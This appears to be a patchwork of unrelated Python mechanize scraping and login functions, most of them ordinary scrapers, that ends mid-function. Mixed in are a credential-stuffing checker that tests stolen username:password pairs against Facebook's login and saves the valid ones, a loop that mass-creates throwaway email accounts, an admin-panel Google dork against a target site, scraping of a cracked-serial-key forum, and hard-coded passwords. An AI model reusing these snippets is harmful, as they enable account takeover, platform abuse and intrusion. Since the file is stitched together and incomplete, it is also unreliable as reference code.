def get_data():
    html = scraperwiki.scrape(edd_url)
    process_ex_dividend_data(html)
    br = Browser()
    br.set_handle_robots(False)
    br.addheaders = [('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')]
    br.open(edd_url)
    links = {}
    for link in br.links():
        if link.text in ['2', '3', '4']:
            links[link.text] = link.url
    for k, link in links.items():
        m = re.search(edd_pat, link)
        br = Browser()
        br.set_handle_robots(False)
        br.addheaders = [('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')]
        br.open(edd_url)
        br.select_form(nr=0)
        br.set_all_readonly(False)
        br["__EVENTTARGET"] = m.group(1)
        br["__EVENTARGUMENT"] = ''
        for c in br.controls:
            if c.type == 'submit':
                c.disabled = True
        response = br.submit()
        process_ex_dividend_data(response.read())
def get_browser():
    # Browser
    br = Browser()
    # Cookie Jar
    #cj = cookielib.LWPCookieJar()
    #br.set_cookiejar(cj)
    # Browser options
    br.set_handle_equiv(True)
    br.set_handle_gzip(True)
    br.set_handle_redirect(True)
    br.set_handle_referer(True)
    br.set_handle_robots(False)
    # Follows refresh 0 but does not hang on refresh > 0
    #br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1)
    # Want debugging messages?
    #br.set_debug_http(True)
    #br.set_debug_redirects(True)
    #br.set_debug_responses(True)
    # User-Agent (this is cheating, ok?)
    br.addheaders = [('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')]
    return br
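# A minimal usage sketch for get_browser() above; the URL is illustrative.
def demo_get_browser():
    br = get_browser()
    response = br.open('http://example.com')
    print response.read()[:200]  # first 200 bytes of the fetched page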
def check(acs):
    for a in acs:
        try:
            a = a.rsplit()[0]
        except:
            pass
        try:
            if a:
                a = a.split(':')
                user = a[0]
                passw = a[1]
                br = Browser()
                br.set_handle_gzip(True)
                br.set_handle_robots(False)
                br.addheaders = [('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')]
                br.open('http://m.facebook.com/login.php')
                br.select_form(nr=0)
                br.form['email'] = user
                br.form['pass'] = passw
                br.submit()
                if ('m.facebook.com/login.php' in br.geturl()
                        or 'checkpoint' in br.geturl()
                        or 'to confirm your account with Facebook.' in br.response().read()):
                    print "Could not login with " + str(a)
                else:
                    print "Logged in with " + user
                    opn = open(newfile, 'a')
                    opn.write(user + ":" + passw + '\n')
                    opn.close()
        except:
            print "Could not login with " + str(a)
def begin_scraper():
    br = Browser()
    br.addheaders = [('User-agent', 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_8; rv:16:0) Gecko/20100101 Firefox/16.0')]
    br.set_handle_robots(False)
    br.open("https://wwws.mint.com/login.event")
    assert br.viewing_html()
    formcount = 0
    for f in br.forms():
        if str(f.attrs["id"]) == "form-login":
            break
        formcount = formcount + 1
    br.select_form(nr=formcount)
    br["username"] = "******"  # Put your username here
    br["password"] = getpass()
    #import pdb; pdb.set_trace()
    # Submit the user credentials to login to mint
    response = br.submit()
    response = br.follow_link(text="Transactions")
    links_to_transactions = br.links(text_regex="Export all \d+ transactions")
    link = ""
    for f in links_to_transactions:
        link = f
    response2 = br.follow_link(link)
    text_file = open("transactions.csv", "w")
    text_file.write(response2.read())
    text_file.close()
def github_connect(path=""):
    """Connect to the website"""
    br = Browser()
    br.set_handle_robots(False)
    br.addheaders = [('User-agent', 'Firefox')]
    br.open('https://github.com/%s' % path)
    return br
def login(url):
    # Use mechanize to get the set name URLs to scrape
    br = Browser()
    br.addheaders = [('User-Agent', ua)]
    br.open(url)
    # Select the form
    for form in br.forms():
        if form.attrs['id'] == 'loginFrm':
            br.form = form
            break
    br["email"] = EMAIL        # replace with email
    br["password"] = PASSWORD  # replace with password
    # Submit the form
    br.submit()
    for form in br.forms():
        if form.attrs['id'] == 'pop_report_form':
            br.form = form
            break
    br['sport_id'] = ['185223']
    br['set_name'] = "T206"
    br.submit(name="search")
    # Follow link to the correct set
    br.follow_link(url="http://www.beckett.com/grading/set_match/3518008")
    return br.response().read()
def returnMnemonics(var):
    from mechanize import Browser
    from bs4 import BeautifulSoup
    # var = "abase"
    br = Browser()
    br.set_handle_robots(False)
    br.set_handle_equiv(False)
    br.addheaders = [('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')]
    url = 'http://mnemonicdictionary.com/?word=' + str(var)
    br.open(url)
    soup_mn = BeautifulSoup(br.response().read())
    # <div style="padding-top: 10px;">
    count_mn = 0
    mnemonics = ""
    for i in soup_mn.find_all('div', {'style': 'padding-top: 10px;'}):
        soup2 = BeautifulSoup(str(i))
        for x in soup2.find_all('div', {'class': 'row-fluid'}):
            soup3 = BeautifulSoup(str(x))
            for y in soup3.find_all('div', {'class': 'span9'}):
                count = 0
                # print count_mn
                if count_mn == 3:
                    break
                count_mn = count_mn + 1
                if y is not None:
                    for z in y:
                        if count == 2:
                            # print z
                            mnemonics = mnemonics + z.strip().replace(',', " ").replace('\n', '').replace(".", "") + ","
                        count = count + 1
    return mnemonics
def get_browser(self):
    """
    Each FAUrl object stores its own browser instance. On the first call
    it is created, and if the username and password are set it will
    authenticate you.

    :return: mechanize.Browser instance.
    :raise: FAiler.FAError if FA is down. Time to F5!
    :raise: FAiler.FAAuth Your username and password failed
    """
    if self._br is None:
        br = Browser()
        br.set_handle_robots(False)
        br.set_handle_redirect(True)
        br.set_handle_referer(True)
        br.set_handle_equiv(True)
        br.addheaders = [('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')]
        if self._username is not None and self._password is not None:
            loginPage = 'https://www.furaffinity.net/login'
            try:
                br.open(loginPage)
            except urllib2.HTTPError:
                raise FAError("FA's down, F5 time.")
            br.form = br.global_form()
            br.form['name'] = self._username
            br.form['pass'] = self._password
            br.form.method = 'POST'
            br.submit()
            if br.geturl() == loginPage + '/?msg=1':
                raise FAAuth('Username & Password Incorrect')
        self._br = br
    return self._br
def respond(permalink, text):
    br = Browser()
    user_agent = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1'
    br.addheaders = [('User-agent', user_agent)]
    soup = BeautifulSoup(br.open(permalink).read())
    urlopen = urllib2.urlopen
    Request = urllib2.Request
    encode = urllib.urlencode
    cj = cookielib.LWPCookieJar()
    opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
    urllib2.install_opener(opener)
    root_comment = soup.find('form', attrs={'class': 'usertext border'})
    thing_id = root_comment.find('input', attrs={'name': 'thing_id'})['value']
    print 'thing_id', thing_id
    # LOG THE F**K IN
    req = Request('http://www.reddit.com/api/login/username',
                  encode({'user': '******', 'passwd': 'hackny', 'api_type': 'json'}),
                  {'User-Agent': user_agent})
    req_open = urlopen(req)
    read = json.loads(req_open.read())
    modhash = read['json']['data']['modhash']
    # POST THE F*****G COMMENT
    req = Request('http://www.reddit.com/api/comment',
                  encode({'thing_id': thing_id,
                          'text': text + '\n\n*This is an automated response.*',
                          'uh': modhash}),
                  {'User-Agent': user_agent})
    req_open = urlopen(req)
    read = json.dumps(req_open.read())
def scrap_query(query, bang=None):
    r = ddg_query('imdb ' + query, bang=bang)
    if 'redirect' in dir(r) and 'primary' in dir(r.redirect):
        url = r.redirect.primary
    else:
        logger.info('Could not find imdb searchpage from DuckDuckGo bang')
        return None
    br = Browser()
    br.set_handle_robots(False)
    br.addheaders = [('User-agent', 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.97 Safari/537.11')]
    r = br.open(url)
    soup = BeautifulSoup(r)
    for link in soup.find_all('a'):
        href = link.get('href', '')
        match = re.search(r"imdb\.com/.*tt(?P<number>[^/]*)", href)
        if match:
            imdb_id = check_imdb(match.group('number'))
            return imdb_id
    return None
def createbrowser(self):
    br = Browser()
    br.set_handle_gzip(True)
    br.set_handle_robots(False)
    br.set_handle_redirect(True)
    br.addheaders = [('User-agent', 'Mozilla/5.0 (iPhone; U; CPU iPhone OS 5_1 like Mac OS X; en-US) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9B179 Safari/7534.48.3')]
    return br
def scrape_info():
    browser = Browser()
    browser.set_handle_robots(False)
    browser.addheaders = [('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')]
    parkIds = []
    for name in config['names']:
        browser.open("https://www.recreation.gov")
        browser.select_form(nr=0)
        browser['locationCriteria'] = name
        response = browser.submit()
        content = response.read()
        soup = BeautifulSoup(content, 'html.parser')
        scripts = soup.select('script')
        for script in scripts:
            if 'SuggestedPlaces' in str(script):
                # str.strip() removes characters from the given set, which
                # happens to peel off the <script> wrapper here
                jsonStr = str(script).strip('<script>var SuggestedPlaces = ').strip(';</script>')
                places = json.loads(jsonStr)
                query = urlparse.parse_qs(places[0]['value'])
                if 'parkId' in query:
                    print('FOUND!: ' + unicode(query['parkId'][0]))
                    parkIds.append(unicode(query['parkId'][0]))
                else:
                    print('No results for ' + name + ': ' + places[0]['value'])
    pprint(parkIds)
def searchTitle(rawtitle):
    br = Browser()
    # Ignore robots.txt
    br.set_handle_robots(False)
    # Google demands a user-agent that isn't a robot
    br.addheaders = [('User-agent', 'Firefox')]
    br.open("http://www.google.com")
    br.select_form('f')
    s = 'imdb' + ' + ' + ' '.join(re.compile('[\.]').split(rawtitle))
    br.form['q'] = s
    br.submit()
    resp = None
    for link in br.links():
        siteMatch = re.compile('www.imdb.com/title/tt[0-9]*/$').search(link.url)
        if siteMatch:
            resp = br.follow_link(link)
            print link.url
            break
    soup = BeautifulSoup(resp.get_data())
    title = re.sub(' - IMDb', '', soup.find('title').string)
    title = re.sub('\([0-9]*\)', '', title)
    return title
def generateSentence(var):
    br = Browser()
    br.set_handle_robots(False)
    br.set_handle_equiv(False)
    br.addheaders = [('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')]
    url = 'http://www.oxforddictionaries.com/definition/english/' + str(var)
    # url = 'https://www.google.co.in/search?q=define+utilitarian'
    try:
        br.open(url)
    except:
        print "what word is this, man? " + var
        return
    soup = BeautifulSoup(br.response().read())
    sentence = ""
    counter = 0
    for i in soup.find_all('ul', {'class': 'sentence_dictionary'}):
        if i is not None:
            soup2 = BeautifulSoup(str(i))
            for j in soup2.find_all('li', {'class': 'sentence'}):
                if j is not None:
                    sentence = sentence + str(counter + 1) + ") " + j.string.replace(',', ' ').strip() + "\n"
                    counter += 1
                    if counter == 2:
                        return sentence
    return sentence
def process(time):
    br = Browser()
    # Ignore robots.txt
    br.set_handle_robots(False)
    # The site demands a user-agent that isn't a robot
    br.addheaders = [('User-agent', 'Firefox')]
    br.open("http://heasarc.gsfc.nasa.gov/cgi-bin/Tools/xTime/xTime.pl")
    br.select_form("form")
    br["time_in_i"] = time  # Enter your time here in the format "2015-06-27 04:23:23.68"
    response = br.submit()
    html = response.read()
    soup = BeautifulSoup(html)
    table = soup.find("table", border=5)
    g = table.findAll('tr')
    row = g[7]  # Select the correct row
    cols = row.findAll('td')
    value = cols[1].string  # This is the MET time
    return value
def testPx(px):
    B = Browser()
    B.addheaders = [('User-agent', userAgents[randint(0, len(userAgents) - 1)])]
    B.set_proxies(px)
    try:
        B.open('http://graphicriver.net/', timeout=5)
        pxQ.put(px)
        print(px['http'] + " ok")
        B.open('http://graphicriver.net/category/all', timeout=5)
    except:
        print(px['http'] + " error")
    page = pageQ.get()
    try:
        count = 0
        while count < 5:
            O = B.open('http://graphicriver.net/category/all?page=' + str(page), timeout=8)
            turls = lxml.html.document_fromstring(O.get_data()).xpath('//div[@class="item-info"]/h3/a/@href')
            for url in turls:
                urlsQ.put(url)
            print(str(page) + " got")
            pageDoneQ.put(page)
            page = pageQ.get()
            count += 1
    except:
        pageQ.put(page)
        print(str(page) + " error")
def login_url(url, login, passwd, form_nomber, login_name, paswd_name, submit_nomber):
    br = Browser()
    showMessage('Creating the browser interface')
    cj = cookielib.LWPCookieJar()
    br.set_cookiejar(cj)
    br.addheaders = [('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')]
    br.open(url)
    showMessage('Loading the site and logging in')
    br.select_form(nr=form_nomber)
    br[login_name] = login
    br[paswd_name] = passwd
    res = br.submit(nr=submit_nomber)
    content = res.read()
    # determine the number of pages
    maxPage = int(max_page(content))
    showMessage('Determining the number of pages and jumping to the last one')
    curPage = 84
    while curPage < maxPage:
        res = br.open('http://forum.rsload.net/cat-kryaki-seriyniki-varez/topic-4820-page-%d.html' % (maxPage))
        curPage = maxPage
        maxPage = int(max_page(content))
        content = res.read()
    # parse the keys
    if get_all_keys(content):
        # Returns True and opens a new tab
        webbrowser.open_new_tab('http://forum.rsload.net/cat-kryaki-seriyniki-varez/topic-4820-page-%d.html' % (maxPage))
def getRandomXKCDComic(urlBase):
    br = Browser()
    br.addheaders = [('User-agent', 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9')]
    br.set_handle_robots(False)
    # XKCD comics are enumerated by URL: http://www.xkcd.com/1, http://www.xkcd.com/2, ..., http://www.xkcd.com/n
    upperBound = 1
    lowerBound = 1
    # Multiply by two until the address no longer exists
    while True:
        link = urlBase + str(upperBound) + "/"
        try:
            response = br.open(link)
        except:
            break
        lowerBound = upperBound
        upperBound = upperBound * 2
    # Binary search for the last comic
    while True:
        pivot = (upperBound + lowerBound) / 2
        link = urlBase + str(pivot) + "/"
        if lowerBound == upperBound or pivot == lowerBound:
            randomComicID = random.randint(1, pivot)
            randPageLink = urlBase + str(randomComicID) + "/"
            return br.open(randPageLink)
        try:
            response = br.open(link)
            lowerBound = pivot
        except:
            upperBound = pivot
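# A minimal usage sketch for getRandomXKCDComic(); the base URL follows the
# enumeration scheme noted in the comments above.
def demo_random_xkcd():
    response = getRandomXKCDComic("http://www.xkcd.com/")
    print response.geturl()  # URL of the randomly chosen comic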
def get_machines(start, num_pages):
    mech = Browser()
    mech.set_handle_robots(False)
    mech.set_handle_equiv(False)
    mech.addheaders = [('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')]
    machines = []
    try:
        page_num = 0
        for page_num in range(start, num_pages + 1):
            print("page %d" % (page_num))
            url = "http://www.pinpedia.com/machine?page=%d" % page_num
            html_page = mech.open(url)
            html = html_page.read()
            machines += parse_page(html)
            time.sleep(0.1)
    except Exception as e:
        print e
    print("finished at page %s" % page_num)
    print("storing machines to machines.txt")
    with open('machines.txt', 'w') as fh:
        for machine in machines:
            fh.write(machine + "\n")
def google(self):
    print("\n\t[!] Searching on Google...\n")
    if self.dork is None:
        query = "site:" + self.target.replace("http://", "").replace("https://", "") + " inurl:(login||adm||admin||admin/account||controlpanel||adminitem||adminitems||administrator||administration||admin_area||manager||letmein||superuser||access||sysadm||superman||supervisor||control||member||members||user||cp||uvpanel||manage||management||signin||log-in||log_in||sign_in||sign-in||users||account)"
    else:
        query = "".join(self.dork)
        query = query.strip("'")
    print("[DORK] >> " + query)
    try:
        query = query.replace(" ", "+")
        req = "https://www.google.com.br/search?q=%s&num=50&start=0" % query
        br = Browser()
        br.set_handle_robots(False)
        br.addheaders = [("User-agent", "chrome")]
        html = br.open(req).read()
        soup = BeautifulSoup(html, "html5lib")
        with open("./output/google-%s.txt" % self.target[8:], "w") as log:
            for results in soup.findAll(attrs={"class": "g"}):
                for title in results.findAll("h3", attrs={"class": "r"}):
                    t = title.text
                    t = t.title()
                for link in results.findAll(attrs={"class": "s"}):
                    l = link.cite.text
                    print(t)
                    print(l + '\n')
                    log.write(str(l) + '\n')
    except Exception as e:
        print(e)
def fetchFromBaidu():
    browser = Browser(history=NoHistory())
    browser.set_handle_robots(False)
    browser.addheaders = USER_AGENT
    page = browser.open(url)
    browser.select_form(name="f1")
    browser['word'] = "西洋美人"
    page = browser.submit()
    if 'Redirecting' in browser.title():
        page = browser.follow_link(text_regex='click here')
    # Base URL parts for resolving relative image paths; 'parsed' was
    # undefined in the original, so this initialization is an assumption.
    parsed = list(urlparse.urlparse(url))
    soup = bs(page.read())
    for image in soup.findAll("img"):
        try:
            print "Image: %(src)s" % image
            filename = image["src"].split("/")[-1]
            if fnmatch(filename, "*.jpg") or fnmatch(filename, "*.jpeg"):
                parsed[2] = image["src"]
                outpath = os.path.join(out_folder, filename)
                if image["src"].lower().startswith("http"):
                    urlretrieve(image["src"], outpath)
                else:
                    urlretrieve(urlparse.urlunparse(parsed), outpath)
        except KeyError:
            continue
def __init__(self, config):
    self.login_url = 'http://%s.ogame.gameforge.com/' % config.country
    # http://s114-br.ogame.gameforge.com/game/index.php?page=overview
    self.index_url = 'http://s%s-%s.ogame.gameforge.com' % (config.universe, config.country) + '/game/index.php'
    headers = [('User-agent', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36')]
    # Authentication data
    self.username = config.username
    self.password = config.password
    self.universe = config.universe
    self.country = config.country
    self.logger = logging.getLogger('ogame-bot')
    # Setting up the browser
    self.cj = cookielib.LWPCookieJar()
    br = Browser()
    br.set_cookiejar(self.cj)
    br.set_handle_robots(False)
    br.addheaders = headers
    # self.path = os.path.dirname(os.path.realpath(__file__))
    # name of the cookies file
    # self.cookies_file_name = os.path.join(self.path, 'cookies.tmp')
    self.cookies_file_name = 'cookies.tmp'
    super(AuthenticationProvider, self).__init__(br, config)
def create():
    while 1:
        try:
            br = Browser()
            br.set_handle_robots(False)
            br.addheaders = [('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')]
            br.open('https://classic.netaddress.com/tpl/Subscribe/Step1?Locale=en&AdInfo=&Referer=http%3A%2F%2Fwww.netaddress.com%2F&T=1332304112864372')
            br.select_form(name='Step1')
            userid = randomname()
            br.form['usrUserId'] = userid
            pwd = randomname()
            br.form['newPasswd'] = pwd
            br.form['RPasswd'] = pwd
            br.form['usrFirst'] = randomname()
            br.form['usrLast'] = randomname()
            br.form['usrTimeZone'] = ['Africa/Abidjan']
            br.form['usrCn'] = ['AF']
            br.submit()
            print "Created " + userid + " with password " + pwd
            filo = open(filex, 'a')
            filo.write(userid + "@usa.net" + ":" + pwd + "\n")
            filo.close()
        except:
            print "error"
def get_google_news_by_url(url):
    # Construct browser object
    browser = Browser()
    ua = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.81 Safari/537.36'
    browser.addheaders = [('User-Agent', ua), ('Accept', '*/*')]
    # Do not observe rules from robots.txt
    browser.set_handle_robots(False)
    # Create HTML document
    html = fromstring(browser.open(url).read())
    # Get number of pages
    xpath_pages = '//a[@class="fl"]'
    page_num = len(html.xpath(xpath_pages)) + 1
    # Get all page urls
    urls = generate_url_pages(url, page_num)
    print 'On ' + str(len(urls)) + ' pages:'
    df = [None] * page_num
    # Iterate through all pages of this url
    for index, url in enumerate(urls):
        page_html = fromstring(browser.open(url).read())
        df[index] = get_google_news_in_page(page_html)
    return pd.concat(df, ignore_index=True)
def find_first_article():
    mech = Browser()
    cj = cookielib.LWPCookieJar()
    mech.set_handle_equiv(True)
    # mech.set_handle_gzip(True)
    mech.set_handle_redirect(True)
    mech.set_handle_referer(True)
    mech.set_handle_robots(False)
    # mech.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1)
    mech.addheaders = [("User-agent", "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1")]
    page = mech.open("https://bitcointalk.org/index.php?board=77.0")
    html = page.read()
    soup = BeautifulSoup(html)
    first_article_tag = soup.find("td", class_="windowbg")
    global startingpost
    startingpost = first_article_tag.span.a.get("href")
    print startingpost
def scrape(self):
    """
    Opens the html page and parses the pdf links.
    """
    browser = Browser()
    #-----------
    user_agent = 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)'
    values1 = {'name': 'Michael Foord',
               'location': 'Northampton',
               'language': 'Python'}
    headers = {'User-Agent': user_agent}
    browser.set_handle_redirect(True)
    browser.set_handle_referer(True)
    browser.set_handle_robots(False)
    browser.addheaders = [('User-Agent', 'Firefox')]
    #-------------
    browser.set_handle_robots(False)
    html = browser.open(self.site)
    lines = html.read().splitlines()
    for line in lines:
        urls = re.findall('<a href="?\'?([^"\'>]*)', line)
        for url in urls:
            if '.pdf"' in url:
                self.pdf_urls.append(url)
def extract_article_url(posturl):
    mech = Browser()
    cj = cookielib.LWPCookieJar()
    mech.set_handle_equiv(True)
    # mech.set_handle_gzip(True)
    mech.set_handle_redirect(True)
    mech.set_handle_referer(True)
    mech.set_handle_robots(False)
    # mech.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1)
    mech.addheaders = [("User-agent", "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1")]
    page = mech.open(posturl)
    html = page.read()
    global soup
    soup = BeautifulSoup(html)
    global articleURL
    # print soup.prettify()
    for item in soup.find_all("div", class_="post"):
        for link in item.find_all("a"):
            string = link.get("href")
            if prog.match(string):
                # find the link to the article (a link outside of the bitcointalk.org forum)
                articleURL = link.get("href")
                return link.get("href")
    return "No article url"
def parseFeeds(self):
    mech = Browser()
    mech.addheaders = [('User-agent', 'Mozilla/5.0 (compatible)')]
    mech.set_handle_robots(False)
    for url in self.feedUrls:
        # url = "http://feeds.feedburner.com/PurdueEngNews?format=xml"
        page = mech.open(url)
        html = page.read()
        soup = BeautifulStoneSoup(html)
        headlines = []
        descriptions = []
        i = 0
        self.newsList = []
        for item in soup.findAll('item'):
            if i > 20:
                break
            date = item.find('pubdate')
            title = item.find('title')
            link = item.find('link')
            desc = item.find('description')
            if len(title.contents) > 0:
                title2 = title.contents[0]
            else:
                title2 = 'None'
            self.newsList.append(NewsStory(date.contents[0], title2,
                                           link.contents[0], desc.contents[0]))
            i += 1
        for story in self.newsList:
            headlines.append(story.title)
            descriptions.append(story.link)
            # story.display()
        self.headlineList.append(headlines)
        self.descList.append(descriptions)
    self.populateTopicList()
def google(query):
    print("\n\t[!] Searching on Google...\n")
    print("[QUERY] >> " + query)
    try:
        query = query.replace(" ", "+")
        req = "https://www.google.com.br/search?q=%s&num=50&start=0" % query
        br = Browser()
        br.set_handle_robots(False)
        br.addheaders = [("User-agent", "chrome")]
        html = br.open(req).read()
        soup = BeautifulSoup(html, "html5lib")
        with open("./output/google-%s.txt" % query[8:], "w") as log:
            for results in soup.findAll(attrs={"class": "g"}):
                for title in results.findAll("h3", attrs={"class": "r"}):
                    t = title.text
                    t = t.title()
                for link in results.findAll(attrs={"class": "s"}):
                    l = link.cite.text
                    print(t)
                    print(l + '\n')
                    log.write(str(l) + '\n')
    except Exception as e:
        print(e)
def cmdlogin(account, username, password, verbose):
    # Login function for cmd tools.
    # Actually this code applies only to otenet logins.
    # Note: 'foobar' is never created here, so it is assumed to be a
    # module-level Browser instance shared with the rest of the tool.
    testfoo = Browser()
    testfoo.set_handle_robots(False)
    login_page = acc_openlogin[str(account)]  # find url
    foobar.addheaders = [("User-agent", "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)")]  # add headers
    testfoo.addheaders = [("User-agent", "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)")]  # add headers
    try:
        if verbose:
            print "Opening url --> " + login_page
        foobar.open(login_page)  # open url
    except:
        sys.exit("ERROR: Check your internet connection and try again...")
    if verbose:
        print "Connection established"
    if account == "otenet":
        foobar.select_form(name="loginform")
    elif account != "otenet":
        foobar.select_form(nr=0)
    if account == "voipbuster":
        foobar["login[username]"] = username
        foobar["login[password]"] = password
    elif account != "forthnet":
        foobar["username"] = username
        foobar["password"] = password
    else:
        foobar["Username"] = username
        foobar["Password"] = password
    try:
        if verbose:
            print "Verifying data..."
        foobar.submit()
    except:
        sys.exit("ERROR: Check your internet connection and try again...")
    time.sleep(2)  # create a small delay
    ok = 0
    testfoo = foobar
    repeat = 0
    while repeat <= 2:  # do 3 login attempts just in case there is a network error or smth
        try:
            time.sleep(1)
            leftcred = creditsleft(account, testfoo, verbose)
            break
        except:
            repeat = repeat + 1  # increase login attempts
            if repeat <= 3:
                if verbose:
                    print "Retrying to login...(" + str(repeat) + "/3)"
            else:  # in case all of them failed
                sys.exit("Cannot login to " + account + ". Invalid credentials or network error. Please try again :-)")
    if verbose:
        print "Logged in to " + account
    if account == "otenet" or account == "forthnet":
        print "SMS left: " + str(leftcred)
    elif account != "otenet" and account != "forthnet":
        print "Credits left: " + str(leftcred)
    if leftcred <= "0.03":
        sys.exit("You cant send more messages today :-(")
    return leftcred
def open_browser(url):
    '''
    INPUT: string containing url to open
    OUTPUT: browser object

    Open the requested page and return a browser object.
    '''
    br = Browser()  # Initialize browser object
    br.addheaders = [('User-agent', 'Firefox')]
    br.open(url)  # Retrieve the requested page
    br.select_form(nr=0)
    return br
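# A minimal usage sketch for open_browser(); the URL and the field name 'q'
# are illustrative assumptions, not taken from the function above.
def demo_open_browser():
    br = open_browser('http://example.com/search')
    br.form['q'] = 'mechanize'  # assumes the first form has a text field named 'q'
    result = br.submit()
    print result.read()[:200]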
def get_data_urls(url):
    br = Browser()
    br.set_handle_robots(False)
    br.addheaders = [('User-agent', 'Firefox')]
    # Retrieve the page, saving the response
    br.open(url)
    data_urls = []
    for link in br.links(url_regex="ssl.berkeley.edu"):
        data_urls.append(link.url)
    return data_urls
def no_js_get_source(self):
    br = Browser()
    br.set_handle_equiv(True)
    br.set_handle_referer(True)
    br.set_handle_robots(False)
    br.set_cookiejar(LWPCookieJar())
    br.addheaders = [('User-agent', USER_AGENT)]
    br.set_handle_refresh(_http.HTTPRefreshProcessor(), max_time=10)
    try:
        return br.open(self.url).read()
    except:
        exit('[!] Failed to fetch html source')
def getRoundPage(self, i):
    br = Browser()
    br.addheaders = [('User-agent', 'Firefox')]
    br.open(self.url)
    if i is not None:
        br.select_form(name="selectRound")
        br['selCount'] = [str(i)]
        br.submit()
    else:
        i = 0
    soup = BeautifulSoup(br.response().read(), features='html.parser')
    return soup
def query_timetree(taxon_a, taxon_b):
    '''Mechanize is used to query the web interface of timetree with two
    taxa; returns the result page after submitting the query form.'''
    br = Browser()
    br.addheaders = [('User-agent', 'Firefox')]
    br.set_handle_robots(False)
    br.open("http://timetree.org")
    br.select_form(name="query_frm")
    br['taxon_a'] = taxon_a
    br['taxon_b'] = taxon_b
    resp = br.submit()
    html = resp.get_data()
    return html
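# A minimal usage sketch for query_timetree(); the taxon names are illustrative.
def demo_query_timetree():
    html = query_timetree('Homo sapiens', 'Mus musculus')
    print '%d bytes of result page' % len(html)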
def test():
    from mechanize import Browser
    USER_AGENT = "Mozilla/5.0 (X11; U; Linux i686; tr-TR; rv:1.8.1.9) Gecko/20071102 Pardus/2007 Firefox/2.0.0.9"
    br = Browser()
    br.addheaders = [("User-agent", USER_AGENT)]
    url = "https://login.yahoo.co.jp/config/login?.src=&.done=http%3A//www.yahoo.co.jp/"
    br.open(url)
    br.select_form("login_form")
    br['login'] = "******"
    br['passwd'] = "877877"
    response = br.submit()
    print response.read()
def ma_dv_hotline(cityName):
    br = Browser()
    br.set_handle_robots(False)   # ignore robots
    br.set_handle_refresh(False)  # can sometimes hang without this
    br.addheaders = [('User-agent', 'Firefox')]
    br.open("https://findhelp.janedoe.org/find_help/search")
    br.select_form(id="searchprograms")
    br["city"] = [cityName]
    response = br.submit()
    # decode to get rid of bytes-type errors and strip the doctype
    cleanResponse = response.read().decode("utf-8")
    cleanResponse = cleanResponse.replace('<!DOCTYPE html>', '')
    return cleanResponse
def read_all_result_page_links_for(mainurl):
    br = Browser()
    br.set_handle_robots(False)
    br.addheaders = [('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')]
    br.open(mainurl)
    nice_links = [l for l in br.links() if 'company' in l.url]
    for link in nice_links:
        read_detail_page(link.url)
def _download_metadata():
    # Does *NOT* work because of nasty javascript;
    # probably need to use selenium.
    from mechanize import Browser
    br = Browser()
    br.addheaders = [('User-agent', 'Firefox')]
    br.set_handle_robots(False)
    br.open('http://mdgs.un.org/unsd/mdg/Metadata.aspx')
    br.follow_link(text='Flat View')
    assert br.viewing_html()
    out = br.response().read()
    # TODO: extract option list and then clean up
    return out
def downloadAll(username, courseName):
    br = Browser()
